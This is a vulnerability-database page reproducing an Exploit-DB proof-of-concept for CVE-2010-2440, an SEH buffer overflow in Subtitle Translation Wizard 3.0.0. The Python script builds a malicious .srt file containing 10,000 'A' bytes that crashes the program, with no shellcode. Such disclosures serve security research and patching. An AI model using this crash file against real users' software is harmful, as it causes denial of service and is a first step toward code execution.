Lucene search
+L

Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)

🗓️ 22 Jun 2010 00:00:00Reported by blakeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Subtitle Translation Wizard v3.0.0 - Overflow (SEH) (PoC) - Exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-2440
22 Jun 201000:00
circl
cve
CVE
CVE-2010-2440
24 Jun 201017:00
cve
cvelist
Cvelist
CVE-2010-2440
24 Jun 201017:00
cvelist
euvd
EUVD
EUVD-2010-2449
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-2440
24 Jun 201017:30
nvd
openvas
OpenVAS
Subtitle Translation Wizard '.srt' File Stack Based Buffer Overflow Vulnerability
16 Aug 201000:00
openvas
openvas
OpenVAS
Subtitle Translation Wizard '.srt' File Stack Based Buffer Overflow Vulnerability
16 Aug 201000:00
openvas
prion
Prion
Stack overflow
24 Jun 201017:30
prion
redhatcve
RedhatCVE
CVE-2010-2440
22 May 202504:36
redhatcve
#!/usr/bin/python

# Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC
# Date: Jun 21, 2010
# Author: Blake
# Software Link: http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe
# Version: 3.0.0
# Tested on: Windows Vista running in VirtualBox

# SEH is overwritten but only unicode compatible pop pop ret addresses are in st-wizard.exe (SafeSEH).

print "\n======================================"
print " Subtitle Translation Wizard v3.0.0 DoS "
print " Discovered by Blake "
print "======================================\n"

buffer = "\x41" * 10000

print "[+] Creating malicious srt file"
try:
     file = open("poc.srt","w")
     file.write("1\n" + "00:01:48,549 --> 00:01:50,404\n" + buffer)
     file.close()
     print "[+] File created"
except:
     print "[x] Could not create file"

raw_input("\nPress any key to exit...\n")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jun 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.05586
33